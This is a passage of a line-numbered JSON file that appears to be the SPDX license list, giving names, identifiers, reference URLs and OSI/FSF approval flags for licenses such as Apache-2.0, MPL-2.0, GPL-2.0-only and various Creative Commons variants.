852 "isOsiApproved": false
853 },
854 {
855 "reference": "https://spdx.org/licenses/CC-BY-NC-2.5.html",
856 "isDeprecatedLicenseId": false,
857 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.5.json",
858 "referenceNumber": 69,
859 "name": "Creative Commons Attribution Non Commercial 2.5 Generic",
860 "licenseId": "CC-BY-NC-2.5",
861 "seeAlso": [
862 "https://creativecommons.org/licenses/by-nc/2.5/legalcode"
863 ],
864 "isOsiApproved": false
865 },
866 {
867 "reference": "https://spdx.org/licenses/Zlib.html",
868 "isDeprecatedLicenseId": false,
869 "detailsUrl": "https://spdx.org/licenses/Zlib.json",
870 "referenceNumber": 70,
871 "name": "zlib License",
872 "licenseId": "Zlib",
873 "seeAlso": [
874 "http://www.zlib.net/zlib_license.html",
875 "https://opensource.org/licenses/Zlib"
876 ],
877 "isOsiApproved": true,
878 "isFsfLibre": true
879 },
880 {
881 "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.html",
882 "isDeprecatedLicenseId": false,
883 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.json",
884 "referenceNumber": 71,
885 "name": "GNU Free Documentation License v1.3 or later - invariants",
886 "licenseId": "GFDL-1.3-invariants-or-later",
887 "seeAlso": [
888 "https://www.gnu.org/licenses/fdl-1.3.txt"
889 ],
890 "isOsiApproved": false
891 },
892 {
893 "reference": "https://spdx.org/licenses/CC-BY-3.0-AT.html",
894 "isDeprecatedLicenseId": false,
895 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-AT.json",
896 "referenceNumber": 72,
897 "name": "Creative Commons Attribution 3.0 Austria",
898 "licenseId": "CC-BY-3.0-AT",
899 "seeAlso": [
900 "https://creativecommons.org/licenses/by/3.0/at/legalcode"
901 ],
902 "isOsiApproved": false
903 },
904 {
905 "reference": "https://spdx.org/licenses/LPPL-1.3c.html",
906 "isDeprecatedLicenseId": false,
907 "detailsUrl": "https://spdx.org/licenses/LPPL-1.3c.json",
908 "referenceNumber": 73,
909 "name": "LaTeX Project Public License v1.3c",
910 "licenseId": "LPPL-1.3c",
911 "seeAlso": [
912 "http://www.latex-project.org/lppl/lppl-1-3c.txt",
913 "https://opensource.org/licenses/LPPL-1.3c"
914 ],
915 "isOsiApproved": true
916 },
917 {
918 "reference": "https://spdx.org/licenses/EPL-1.0.html",
919 "isDeprecatedLicenseId": false,
920 "detailsUrl": "https://spdx.org/licenses/EPL-1.0.json",
921 "referenceNumber": 74,
922 "name": "Eclipse Public License 1.0",
923 "licenseId": "EPL-1.0",
924 "seeAlso": [
925 "http://www.eclipse.org/legal/epl-v10.html",
926 "https://opensource.org/licenses/EPL-1.0"
927 ],
928 "isOsiApproved": true,
929 "isFsfLibre": true
930 },
931 {
932 "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.html",
933 "isDeprecatedLicenseId": false,
934 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.json",
935 "referenceNumber": 75,
936 "name": "GNU Free Documentation License v1.1 or later - invariants",
937 "licenseId": "GFDL-1.1-invariants-or-later",
938 "seeAlso": [
939 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
940 ],
941 "isOsiApproved": false
942 },
943 {
944 "reference": "https://spdx.org/licenses/ANTLR-PD-fallback.html",
945 "isDeprecatedLicenseId": false,
946 "detailsUrl": "https://spdx.org/licenses/ANTLR-PD-fallback.json",
947 "referenceNumber": 76,
948 "name": "ANTLR Software Rights Notice with license fallback",
949 "licenseId": "ANTLR-PD-fallback",
950 "seeAlso": [
951 "http://www.antlr2.org/license.html"
952 ],
953 "isOsiApproved": false
954 },
955 {
956 "reference": "https://spdx.org/licenses/OLDAP-2.4.html",
957 "isDeprecatedLicenseId": false,
958 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.4.json",
959 "referenceNumber": 77,
960 "name": "Open LDAP Public License v2.4",
961 "licenseId": "OLDAP-2.4",
962 "seeAlso": [
963 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcd1284c4a91a8a380d904eee68d1583f989ed386"
964 ],
965 "isOsiApproved": false
966 },
967 {
968 "reference": "https://spdx.org/licenses/OLDAP-2.3.html",
969 "isDeprecatedLicenseId": false,
970 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.3.json",
971 "referenceNumber": 78,
972 "name": "Open LDAP Public License v2.3",
973 "licenseId": "OLDAP-2.3",
974 "seeAlso": [
975 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dd32cf54a32d581ab475d23c810b0a7fbaf8d63c3"
976 ],
977 "isOsiApproved": false,
978 "isFsfLibre": true
979 },
980 {
981 "reference": "https://spdx.org/licenses/ZPL-2.1.html",
982 "isDeprecatedLicenseId": false,
983 "detailsUrl": "https://spdx.org/licenses/ZPL-2.1.json",
984 "referenceNumber": 79,
985 "name": "Zope Public License 2.1",
986 "licenseId": "ZPL-2.1",
987 "seeAlso": [
988 "http://old.zope.org/Resources/ZPL/"
989 ],
990 "isOsiApproved": true,
991 "isFsfLibre": true
992 },
993 {
994 "reference": "https://spdx.org/licenses/Apache-2.0.html",
995 "isDeprecatedLicenseId": false,
996 "detailsUrl": "https://spdx.org/licenses/Apache-2.0.json",
997 "referenceNumber": 80,
998 "name": "Apache License 2.0",
999 "licenseId": "Apache-2.0",
1000 "seeAlso": [
1001 "https://www.apache.org/licenses/LICENSE-2.0",
1002 "https://opensource.org/licenses/Apache-2.0"
1003 ],
1004 "isOsiApproved": true,
1005 "isFsfLibre": true
1006 },
1007 {
1008 "reference": "https://spdx.org/licenses/SGI-B-2.0.html",
1009 "isDeprecatedLicenseId": false,
1010 "detailsUrl": "https://spdx.org/licenses/SGI-B-2.0.json",
1011 "referenceNumber": 81,
1012 "name": "SGI Free Software License B v2.0",
1013 "licenseId": "SGI-B-2.0",
1014 "seeAlso": [
1015 "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.2.0.pdf"
1016 ],
1017 "isOsiApproved": false,
1018 "isFsfLibre": true
1019 },
1020 {
1021 "reference": "https://spdx.org/licenses/Hippocratic-2.1.html",
1022 "isDeprecatedLicenseId": false,
1023 "detailsUrl": "https://spdx.org/licenses/Hippocratic-2.1.json",
1024 "referenceNumber": 82,
1025 "name": "Hippocratic License 2.1",
1026 "licenseId": "Hippocratic-2.1",
1027 "seeAlso": [
1028 "https://firstdonoharm.dev/version/2/1/license.html",
1029 "https://github.com/EthicalSource/hippocratic-license/blob/58c0e646d64ff6fbee275bfe2b9492f914e3ab2a/LICENSE.txt"
1030 ],
1031 "isOsiApproved": false
1032 },
1033 {
1034 "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.html",
1035 "isDeprecatedLicenseId": false,
1036 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.json",
1037 "referenceNumber": 83,
1038 "name": "Creative Commons Attribution Share Alike 3.0 Germany",
1039 "licenseId": "CC-BY-SA-3.0-DE",
1040 "seeAlso": [
1041 "https://creativecommons.org/licenses/by-sa/3.0/de/legalcode"
1042 ],
1043 "isOsiApproved": false
1044 },
1045 {
1046 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.html",
1047 "isDeprecatedLicenseId": false,
1048 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.json",
1049 "referenceNumber": 84,
1050 "name": "Creative Commons Attribution Non Commercial Share Alike 1.0 Generic",
1051 "licenseId": "CC-BY-NC-SA-1.0",
1052 "seeAlso": [
1053 "https://creativecommons.org/licenses/by-nc-sa/1.0/legalcode"
1054 ],
1055 "isOsiApproved": false
1056 },
1057 {
1058 "reference": "https://spdx.org/licenses/LGPL-2.1-or-later.html",
1059 "isDeprecatedLicenseId": false,
1060 "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-or-later.json",
1061 "referenceNumber": 85,
1062 "name": "GNU Lesser General Public License v2.1 or later",
1063 "licenseId": "LGPL-2.1-or-later",
1064 "seeAlso": [
1065 "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
1066 "https://opensource.org/licenses/LGPL-2.1"
1067 ],
1068 "isOsiApproved": true,
1069 "isFsfLibre": true
1070 },
1071 {
1072 "reference": "https://spdx.org/licenses/CC-BY-3.0-US.html",
1073 "isDeprecatedLicenseId": false,
1074 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-US.json",
1075 "referenceNumber": 86,
1076 "name": "Creative Commons Attribution 3.0 United States",
1077 "licenseId": "CC-BY-3.0-US",
1078 "seeAlso": [
1079 "https://creativecommons.org/licenses/by/3.0/us/legalcode"
1080 ],
1081 "isOsiApproved": false
1082 },
1083 {
1084 "reference": "https://spdx.org/licenses/TCP-wrappers.html",
1085 "isDeprecatedLicenseId": false,
1086 "detailsUrl": "https://spdx.org/licenses/TCP-wrappers.json",
1087 "referenceNumber": 87,
1088 "name": "TCP Wrappers License",
1089 "licenseId": "TCP-wrappers",
1090 "seeAlso": [
1091 "http://rc.quest.com/topics/openssh/license.php#tcpwrappers"
1092 ],
1093 "isOsiApproved": false
1094 },
1095 {
1096 "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.html",
1097 "isDeprecatedLicenseId": false,
1098 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.json",
1099 "referenceNumber": 88,
1100 "name": "GNU Free Documentation License v1.2 or later - invariants",
1101 "licenseId": "GFDL-1.2-invariants-or-later",
1102 "seeAlso": [
1103 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
1104 ],
1105 "isOsiApproved": false
1106 },
1107 {
1108 "reference": "https://spdx.org/licenses/Eurosym.html",
1109 "isDeprecatedLicenseId": false,
1110 "detailsUrl": "https://spdx.org/licenses/Eurosym.json",
1111 "referenceNumber": 89,
1112 "name": "Eurosym License",
1113 "licenseId": "Eurosym",
1114 "seeAlso": [
1115 "https://fedoraproject.org/wiki/Licensing/Eurosym"
1116 ],
1117 "isOsiApproved": false
1118 },
1119 {
1120 "reference": "https://spdx.org/licenses/GFDL-1.1.html",
1121 "isDeprecatedLicenseId": true,
1122 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1.json",
1123 "referenceNumber": 90,
1124 "name": "GNU Free Documentation License v1.1",
1125 "licenseId": "GFDL-1.1",
1126 "seeAlso": [
1127 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
1128 ],
1129 "isOsiApproved": false,
1130 "isFsfLibre": true
1131 },
1132 {
1133 "reference": "https://spdx.org/licenses/LPPL-1.0.html",
1134 "isDeprecatedLicenseId": false,
1135 "detailsUrl": "https://spdx.org/licenses/LPPL-1.0.json",
1136 "referenceNumber": 91,
1137 "name": "LaTeX Project Public License v1.0",
1138 "licenseId": "LPPL-1.0",
1139 "seeAlso": [
1140 "http://www.latex-project.org/lppl/lppl-1-0.txt"
1141 ],
1142 "isOsiApproved": false
1143 },
1144 {
1145 "reference": "https://spdx.org/licenses/LGPL-2.0+.html",
1146 "isDeprecatedLicenseId": true,
1147 "detailsUrl": "https://spdx.org/licenses/LGPL-2.0+.json",
1148 "referenceNumber": 92,
1149 "name": "GNU Library General Public License v2 or later",
1150 "licenseId": "LGPL-2.0+",
1151 "seeAlso": [
1152 "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
1153 ],
1154 "isOsiApproved": true
1155 },
1156 {
1157 "reference": "https://spdx.org/licenses/SGI-B-1.0.html",
1158 "isDeprecatedLicenseId": false,
1159 "detailsUrl": "https://spdx.org/licenses/SGI-B-1.0.json",
1160 "referenceNumber": 93,
1161 "name": "SGI Free Software License B v1.0",
1162 "licenseId": "SGI-B-1.0",
1163 "seeAlso": [
1164 "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.1.0.html"
1165 ],
1166 "isOsiApproved": false
1167 },
1168 {
1169 "reference": "https://spdx.org/licenses/APL-1.0.html",
1170 "isDeprecatedLicenseId": false,
1171 "detailsUrl": "https://spdx.org/licenses/APL-1.0.json",
1172 "referenceNumber": 94,
1173 "name": "Adaptive Public License 1.0",
1174 "licenseId": "APL-1.0",
1175 "seeAlso": [
1176 "https://opensource.org/licenses/APL-1.0"
1177 ],
1178 "isOsiApproved": true
1179 },
1180 {
1181 "reference": "https://spdx.org/licenses/libtiff.html",
1182 "isDeprecatedLicenseId": false,
1183 "detailsUrl": "https://spdx.org/licenses/libtiff.json",
1184 "referenceNumber": 95,
1185 "name": "libtiff License",
1186 "licenseId": "libtiff",
1187 "seeAlso": [
1188 "https://fedoraproject.org/wiki/Licensing/libtiff"
1189 ],
1190 "isOsiApproved": false
1191 },
1192 {
1193 "reference": "https://spdx.org/licenses/AFL-2.1.html",
1194 "isDeprecatedLicenseId": false,
1195 "detailsUrl": "https://spdx.org/licenses/AFL-2.1.json",
1196 "referenceNumber": 96,
1197 "name": "Academic Free License v2.1",
1198 "licenseId": "AFL-2.1",
1199 "seeAlso": [
1200 "http://opensource.linux-mirror.org/licenses/afl-2.1.txt"
1201 ],
1202 "isOsiApproved": true,
1203 "isFsfLibre": true
1204 },
1205 {
1206 "reference": "https://spdx.org/licenses/CC-BY-NC-1.0.html",
1207 "isDeprecatedLicenseId": false,
1208 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-1.0.json",
1209 "referenceNumber": 97,
1210 "name": "Creative Commons Attribution Non Commercial 1.0 Generic",
1211 "licenseId": "CC-BY-NC-1.0",
1212 "seeAlso": [
1213 "https://creativecommons.org/licenses/by-nc/1.0/legalcode"
1214 ],
1215 "isOsiApproved": false
1216 },
1217 {
1218 "reference": "https://spdx.org/licenses/GD.html",
1219 "isDeprecatedLicenseId": false,
1220 "detailsUrl": "https://spdx.org/licenses/GD.json",
1221 "referenceNumber": 98,
1222 "name": "GD License",
1223 "licenseId": "GD",
1224 "seeAlso": [
1225 "https://libgd.github.io/manuals/2.3.0/files/license-txt.html"
1226 ],
1227 "isOsiApproved": false
1228 },
1229 {
1230 "reference": "https://spdx.org/licenses/AFL-1.1.html",
1231 "isDeprecatedLicenseId": false,
1232 "detailsUrl": "https://spdx.org/licenses/AFL-1.1.json",
1233 "referenceNumber": 99,
1234 "name": "Academic Free License v1.1",
1235 "licenseId": "AFL-1.1",
1236 "seeAlso": [
1237 "http://opensource.linux-mirror.org/licenses/afl-1.1.txt",
1238 "http://wayback.archive.org/web/20021004124254/http://www.opensource.org/licenses/academic.php"
1239 ],
1240 "isOsiApproved": true,
1241 "isFsfLibre": true
1242 },
1243 {
1244 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.html",
1245 "isDeprecatedLicenseId": false,
1246 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.json",
1247 "referenceNumber": 100,
1248 "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 IGO",
1249 "licenseId": "CC-BY-NC-ND-3.0-IGO",
1250 "seeAlso": [
1251 "https://creativecommons.org/licenses/by-nc-nd/3.0/igo/legalcode"
1252 ],
1253 "isOsiApproved": false
1254 },
1255 {
1256 "reference": "https://spdx.org/licenses/Unicode-DFS-2015.html",
1257 "isDeprecatedLicenseId": false,
1258 "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2015.json",
1259 "referenceNumber": 101,
1260 "name": "Unicode License Agreement - Data Files and Software (2015)",
1261 "licenseId": "Unicode-DFS-2015",
1262 "seeAlso": [
1263 "https://web.archive.org/web/20151224134844/http://unicode.org/copyright.html"
1264 ],
1265 "isOsiApproved": false
1266 },
1267 {
1268 "reference": "https://spdx.org/licenses/GFDL-1.2-only.html",
1269 "isDeprecatedLicenseId": false,
1270 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-only.json",
1271 "referenceNumber": 102,
1272 "name": "GNU Free Documentation License v1.2 only",
1273 "licenseId": "GFDL-1.2-only",
1274 "seeAlso": [
1275 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
1276 ],
1277 "isOsiApproved": false,
1278 "isFsfLibre": true
1279 },
1280 {
1281 "reference": "https://spdx.org/licenses/MPL-1.1.html",
1282 "isDeprecatedLicenseId": false,
1283 "detailsUrl": "https://spdx.org/licenses/MPL-1.1.json",
1284 "referenceNumber": 103,
1285 "name": "Mozilla Public License 1.1",
1286 "licenseId": "MPL-1.1",
1287 "seeAlso": [
1288 "http://www.mozilla.org/MPL/MPL-1.1.html",
1289 "https://opensource.org/licenses/MPL-1.1"
1290 ],
1291 "isOsiApproved": true,
1292 "isFsfLibre": true
1293 },
1294 {
1295 "reference": "https://spdx.org/licenses/GPL-2.0-only.html",
1296 "isDeprecatedLicenseId": false,
1297 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-only.json",
1298 "referenceNumber": 104,
1299 "name": "GNU General Public License v2.0 only",
1300 "licenseId": "GPL-2.0-only",
1301 "seeAlso": [
1302 "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
1303 "https://opensource.org/licenses/GPL-2.0"
1304 ],
1305 "isOsiApproved": true,
1306 "isFsfLibre": true
1307 },
1308 {
1309 "reference": "https://spdx.org/licenses/CC-BY-NC-4.0.html",
1310 "isDeprecatedLicenseId": false,
1311 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-4.0.json",
1312 "referenceNumber": 105,
1313 "name": "Creative Commons Attribution Non Commercial 4.0 International",
1314 "licenseId": "CC-BY-NC-4.0",
1315 "seeAlso": [
1316 "https://creativecommons.org/licenses/by-nc/4.0/legalcode"
1317 ],
1318 "isOsiApproved": false
1319 },
1320 {
1321 "reference": "https://spdx.org/licenses/FreeImage.html",
1322 "isDeprecatedLicenseId": false,
1323 "detailsUrl": "https://spdx.org/licenses/FreeImage.json",
1324 "referenceNumber": 106,
1325 "name": "FreeImage Public License v1.0",
1326 "licenseId": "FreeImage",
1327 "seeAlso": [
1328 "http://freeimage.sourceforge.net/freeimage-license.txt"
1329 ],
1330 "isOsiApproved": false
1331 },
1332 {
1333 "reference": "https://spdx.org/licenses/SHL-0.51.html",
1334 "isDeprecatedLicenseId": false,
1335 "detailsUrl": "https://spdx.org/licenses/SHL-0.51.json",
1336 "referenceNumber": 107,
1337 "name": "Solderpad Hardware License, Version 0.51",
1338 "licenseId": "SHL-0.51",
1339 "seeAlso": [
1340 "https://solderpad.org/licenses/SHL-0.51/"
1341 ],
1342 "isOsiApproved": false
1343 },
1344 {
1345 "reference": "https://spdx.org/licenses/CNRI-Jython.html",
1346 "isDeprecatedLicenseId": false,
1347 "detailsUrl": "https://spdx.org/licenses/CNRI-Jython.json",
1348 "referenceNumber": 108,
1349 "name": "CNRI Jython License",
1350 "licenseId": "CNRI-Jython",
1351 "seeAlso": [
1352 "http://www.jython.org/license.html"
1353 ],
1354 "isOsiApproved": false
1355 },
1356 {
1357 "reference": "https://spdx.org/licenses/ZPL-1.1.html",
1358 "isDeprecatedLicenseId": false,
1359 "detailsUrl": "https://spdx.org/licenses/ZPL-1.1.json",
1360 "referenceNumber": 109,
1361 "name": "Zope Public License 1.1",
1362 "licenseId": "ZPL-1.1",
1363 "seeAlso": [
1364 "http://old.zope.org/Resources/License/ZPL-1.1"
1365 ],
1366 "isOsiApproved": false
1367 },
1368 {
1369 "reference": "https://spdx.org/licenses/Afmparse.html",
1370 "isDeprecatedLicenseId": false,
1371 "detailsUrl": "https://spdx.org/licenses/Afmparse.json",
1372 "referenceNumber": 110,
1373 "name": "Afmparse License",
1374 "licenseId": "Afmparse",
1375 "seeAlso": [
1376 "https://fedoraproject.org/wiki/Licensing/Afmparse"
1377 ],
1378 "isOsiApproved": false
1379 },
1380 {
1381 "reference": "https://spdx.org/licenses/OLDAP-2.1.html",
1382 "isDeprecatedLicenseId": false,
1383 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.1.json",
1384 "referenceNumber": 111,
1385 "name": "Open LDAP Public License v2.1",
1386 "licenseId": "OLDAP-2.1",
1387 "seeAlso": [
1388 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db0d176738e96a0d3b9f85cb51e140a86f21be715"
1389 ],
1390 "isOsiApproved": false
1391 },
1392 {
1393 "reference": "https://spdx.org/licenses/Rdisc.html",
1394 "isDeprecatedLicenseId": false,
1395 "detailsUrl": "https://spdx.org/licenses/Rdisc.json",
1396 "referenceNumber": 112,
1397 "name": "Rdisc License",
1398 "licenseId": "Rdisc",
1399 "seeAlso": [
1400 "https://fedoraproject.org/wiki/Licensing/Rdisc_License"
1401 ],
1402 "isOsiApproved": false
1403 },
1404 {
1405 "reference": "https://spdx.org/licenses/Imlib2.html",
1406 "isDeprecatedLicenseId": false,
1407 "detailsUrl": "https://spdx.org/licenses/Imlib2.json",
1408 "referenceNumber": 113,
1409 "name": "Imlib2 License",
1410 "licenseId": "Imlib2",
1411 "seeAlso": [
1412 "http://trac.enlightenment.org/e/browser/trunk/imlib2/COPYING",
1413 "https://git.enlightenment.org/legacy/imlib2.git/tree/COPYING"
1414 ],
1415 "isOsiApproved": false,
1416 "isFsfLibre": true
1417 },
1418 {
1419 "reference": "https://spdx.org/licenses/BSD-4-Clause-Shortened.html",
1420 "isDeprecatedLicenseId": false,
1421 "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-Shortened.json",
1422 "referenceNumber": 114,
1423 "name": "BSD 4 Clause Shortened",
1424 "licenseId": "BSD-4-Clause-Shortened",
1425 "seeAlso": [
1426 "https://metadata.ftp-master.debian.org/changelogs//main/a/arpwatch/arpwatch_2.1a15-7_copyright"
1427 ],
1428 "isOsiApproved": false
1429 },
1430 {
1431 "reference": "https://spdx.org/licenses/Sendmail.html",
1432 "isDeprecatedLicenseId": false,
1433 "detailsUrl": "https://spdx.org/licenses/Sendmail.json",
1434 "referenceNumber": 115,
1435 "name": "Sendmail License",
1436 "licenseId": "Sendmail",
1437 "seeAlso": [
1438 "http://www.sendmail.com/pdfs/open_source/sendmail_license.pdf",
1439 "https://web.archive.org/web/20160322142305/https://www.sendmail.com/pdfs/open_source/sendmail_license.pdf"
1440 ],
1441 "isOsiApproved": false
1442 },
1443 {
1444 "reference": "https://spdx.org/licenses/CC-BY-2.5.html",
1445 "isDeprecatedLicenseId": false,
1446 "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5.json",
1447 "referenceNumber": 116,
1448 "name": "Creative Commons Attribution 2.5 Generic",
1449 "licenseId": "CC-BY-2.5",
1450 "seeAlso": [
1451 "https://creativecommons.org/licenses/by/2.5/legalcode"
1452 ],
1453 "isOsiApproved": false
1454 },
1455 {
1456 "reference": "https://spdx.org/licenses/AAL.html",
1457 "isDeprecatedLicenseId": false,
1458 "detailsUrl": "https://spdx.org/licenses/AAL.json",
1459 "referenceNumber": 117,
1460 "name": "Attribution Assurance License",
1461 "licenseId": "AAL",
1462 "seeAlso": [
1463 "https://opensource.org/licenses/attribution"
1464 ],
1465 "isOsiApproved": true
1466 },
1467 {
1468 "reference": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.html",
1469 "isDeprecatedLicenseId": false,
1470 "detailsUrl": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.json",
1471 "referenceNumber": 118,
1472 "name": "Mozilla Public License 2.0 (no copyleft exception)",
1473 "licenseId": "MPL-2.0-no-copyleft-exception",
1474 "seeAlso": [
1475 "http://www.mozilla.org/MPL/2.0/",
1476 "https://opensource.org/licenses/MPL-2.0"
1477 ],
1478 "isOsiApproved": true
1479 },
1480 {
1481 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.html",
1482 "isDeprecatedLicenseId": false,
1483 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.json",
1484 "referenceNumber": 119,
1485 "name": "Creative Commons Attribution Non Commercial No Derivatives 2.5 Generic",
1486 "licenseId": "CC-BY-NC-ND-2.5",
1487 "seeAlso": [
1488 "https://creativecommons.org/licenses/by-nc-nd/2.5/legalcode"
1489 ],
1490 "isOsiApproved": false
1491 },
1492 {
1493 "reference": "https://spdx.org/licenses/CC-BY-3.0-NL.html",
1494 "isDeprecatedLicenseId": false,
1495 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-NL.json",
1496 "referenceNumber": 120,
1497 "name": "Creative Commons Attribution 3.0 Netherlands",
1498 "licenseId": "CC-BY-3.0-NL",
1499 "seeAlso": [
1500 "https://creativecommons.org/licenses/by/3.0/nl/legalcode"
1501 ],
1502 "isOsiApproved": false
1503 },
1504 {
1505 "reference": "https://spdx.org/licenses/LPL-1.02.html",
1506 "isDeprecatedLicenseId": false,
1507 "detailsUrl": "https://spdx.org/licenses/LPL-1.02.json",
1508 "referenceNumber": 121,
1509 "name": "Lucent Public License v1.02",
1510 "licenseId": "LPL-1.02",
1511 "seeAlso": [
1512 "http://plan9.bell-labs.com/plan9/license.html",
1513 "https://opensource.org/licenses/LPL-1.02"
1514 ],
1515 "isOsiApproved": true,
1516 "isFsfLibre": true
1517 },
1518 {
1519 "reference": "https://spdx.org/licenses/ECL-1.0.html",
1520 "isDeprecatedLicenseId": false,
1521 "detailsUrl": "https://spdx.org/licenses/ECL-1.0.json",
1522 "referenceNumber": 122,
1523 "name": "Educational Community License v1.0",
1524 "licenseId": "ECL-1.0",
1525 "seeAlso": [
1526 "https://opensource.org/licenses/ECL-1.0"
1527 ],
1528 "isOsiApproved": true
1529 },
1530 {
1531 "reference": "https://spdx.org/licenses/OFL-1.0-no-RFN.html",
1532 "isDeprecatedLicenseId": false,
1533 "detailsUrl": "https://spdx.org/licenses/OFL-1.0-no-RFN.json",
1534 "referenceNumber": 123,
1535 "name": "SIL Open Font License 1.0 with no Reserved Font Name",
1536 "licenseId": "OFL-1.0-no-RFN",
1537 "seeAlso": [
1538 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
1539 ],
1540 "isOsiApproved": false
1541 },
1542 {
1543 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.html",
1544 "isDeprecatedLicenseId": false,
1545 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.json",
1546 "referenceNumber": 124,
1547 "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Germany",
1548 "licenseId": "CC-BY-NC-SA-3.0-DE",
1549 "seeAlso": [
1550 "https://creativecommons.org/licenses/by-nc-sa/3.0/de/legalcode"
1551 ],
1552 "isOsiApproved": false
1553 },
1554 {
1555 "reference": "https://spdx.org/licenses/CC-BY-SA-3.0.html",
1556 "isDeprecatedLicenseId": false,
1557 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0.json",
1558 "referenceNumber": 125,
1559 "name": "Creative Commons Attribution Share Alike 3.0 Unported",
1560 "licenseId": "CC-BY-SA-3.0",
1561 "seeAlso": [
1562 "https://creativecommons.org/licenses/by-sa/3.0/legalcode"
1563 ],
1564 "isOsiApproved": false
1565 },
1566 {
1567 "reference": "https://spdx.org/licenses/NTP.html",
1568 "isDeprecatedLicenseId": false,
1569 "detailsUrl": "https://spdx.org/licenses/NTP.json",
1570 "referenceNumber": 126,
1571 "name": "NTP License",
1572 "licenseId": "NTP",
1573 "seeAlso": [
1574 "https://opensource.org/licenses/NTP"
1575 ],
1576 "isOsiApproved": true
1577 },
1578 {
1579 "reference": "https://spdx.org/licenses/MPL-2.0.html",
1580 "isDeprecatedLicenseId": false,
1581 "detailsUrl": "https://spdx.org/licenses/MPL-2.0.json",
1582 "referenceNumber": 127,
1583 "name": "Mozilla Public License 2.0",
1584 "licenseId": "MPL-2.0",
1585 "seeAlso": [
1586 "https://www.mozilla.org/MPL/2.0/",
1587 "https://opensource.org/licenses/MPL-2.0"
1588 ],
1589 "isOsiApproved": true,
1590 "isFsfLibre": true
1591 },
1592 {
1593 "reference": "https://spdx.org/licenses/APSL-1.2.html",
1594 "isDeprecatedLicenseId": false,
1595 "detailsUrl": "https://spdx.org/licenses/APSL-1.2.json",
1596 "referenceNumber": 128,
1597 "name": "Apple Public Source License 1.2",
1598 "licenseId": "APSL-1.2",
1599 "seeAlso": [
1600 "http://www.samurajdata.se/opensource/mirror/licenses/apsl.php"
1601 ],
1602 "isOsiApproved": true
1603 },
1604 {
1605 "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.html",
1606 "isDeprecatedLicenseId": false,
1607 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.json",
1608 "referenceNumber": 129,
1609 "name": "GNU Free Documentation License v1.2 only - no invariants",
1610 "licenseId": "GFDL-1.2-no-invariants-only",
1611 "seeAlso": [
1612 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
1613 ],
1614 "isOsiApproved": false
1615 },
1616 {
1617 "reference": "https://spdx.org/licenses/Artistic-2.0.html",
1618 "isDeprecatedLicenseId": false,
1619 "detailsUrl": "https://spdx.org/licenses/Artistic-2.0.json",
1620 "referenceNumber": 130,
1621 "name": "Artistic License 2.0",
1622 "licenseId": "Artistic-2.0",
1623 "seeAlso": [
1624 "http://www.perlfoundation.org/artistic_license_2_0",
1625 "https://www.perlfoundation.org/artistic-license-20.html",
1626 "https://opensource.org/licenses/artistic-license-2.0"
1627 ],
1628 "isOsiApproved": true,
1629 "isFsfLibre": true
1630 },
1631 {
1632 "reference": "https://spdx.org/licenses/GPL-2.0.html",
1633 "isDeprecatedLicenseId": true,
1634 "detailsUrl": "https://spdx.org/licenses/GPL-2.0.json",
1635 "referenceNumber": 131,
1636 "name": "GNU General Public License v2.0 only",
1637 "licenseId": "GPL-2.0",
1638 "seeAlso": [
1639 "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
1640 "https://opensource.org/licenses/GPL-2.0"
